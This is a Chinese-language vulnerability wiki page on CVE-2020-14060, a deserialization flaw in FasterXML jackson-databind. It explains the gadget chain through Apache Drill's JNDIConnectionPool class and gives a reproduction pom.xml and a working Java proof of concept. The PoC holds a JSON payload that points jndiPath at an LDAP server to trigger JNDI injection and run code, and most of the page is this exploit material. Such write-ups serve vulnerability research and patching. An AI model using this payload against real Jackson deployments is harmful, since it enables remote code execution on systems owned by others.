menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right FasterXML jackson chevron_right (CVE-2020-14060)FasterXML jackson-databind 反序列化漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-14060)FasterXML jackson-databind 反序列化漏洞.md
    3.18 KB / 2021-04-21 09:23:46
        (CVE-2020-14060)FasterXML jackson-databind 反序列化漏洞
    =========================================================
    
    一、漏洞简介
    ------------
    
    **利用条件**开启`enableDefaultTyping()`使用了`org.apache.drill.exec:drill-jdbc-all`第三方依赖
    
    二、漏洞影响
    ------------
    
    jackson-databind before 2.9.10.4jackson-databind before 2.8.11.6jackson-databind before 2.7.9.7
    
    三、复现过程
    ------------
    
    ### 漏洞分析
    
    首先定位到`oadd.org.apache.xalan.lib.sql.JNDIConnectionPool`类,之后发现一处可疑的JNDI注入:1.png参数为jndiPath,该参数在当前类中有对应的set操作,在反序列化时会调用setJndiPath进行一次赋值操作,故可控:2.png然而我们的`findDatasource`并不会被调用,之后全局搜索`findDatasource`函数,发现存在两处,一处是`testConnect()`,这对我们来说无用,另外一处是getConnection(),该函数在序列化时会被调用:3.png在反序列化操作时,我们可以将`jndipath`指向恶意`LDAP`服务,之后当序列化操作时`getConnection`会被调用,由此导致`findDatasource`被调用,最后导致`JNDI`注入,整个利用链如下所示:
    
        mapper.readValue
            ->setJndiPath
                ->getConnection
                     ->findDatasource
                         ->context.lookup(this.jndiPath);
    
    ### 漏洞复现
    
    > pom.xml
    
        <dependencies>
            <dependency>
              <groupId>com.fasterxml.jackson.core</groupId>
              <artifactId>jackson-databind</artifactId>
              <version>2.9.10.4</version>
            </dependency>
    
            <dependency>
              <groupId>org.apache.drill.exec</groupId>
              <artifactId>drill-jdbc-all</artifactId>
              <version>1.4.0</version>
            </dependency>
    
            <dependency>
              <groupId>org.slf4j</groupId>
              <artifactId>slf4j-nop</artifactId>
              <version>1.7.2</version>
            </dependency>
            <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
            <dependency>
              <groupId>javax.transaction</groupId>
              <artifactId>jta</artifactId>
              <version>1.1</version>
            </dependency>
          </dependencies>
          <!-- https://mvnrepository.com/artifact/org.aoju/bus-core -->
    
    PS:这里的漏洞所使用的库包需要在1.4版本才可以,之后没有该漏洞类,而目前最新的已经是1.17.0了,所以总体来说较为鸡肋\~
    
    > POC:
    
        package com.jacksonTest;
    
        import com.fasterxml.jackson.databind.ObjectMapper;
    
        import java.io.IOException;
    
        public class Poc {
            public static void main(String[] args) throws Exception {
                ObjectMapper mapper = new ObjectMapper();
                mapper.enableDefaultTyping();
                String payload = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
                try {
                    Object obj = mapper.readValue(payload, Object.class);
                    mapper.writeValueAsString(obj);
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
    
    之后运行该程序,成功执行命令,弹出计算器:
    
    4.png
    
    参考链接
    --------
    
    > https://xz.aliyun.com/t/8012\#toc-12
    
    
    links
    file_download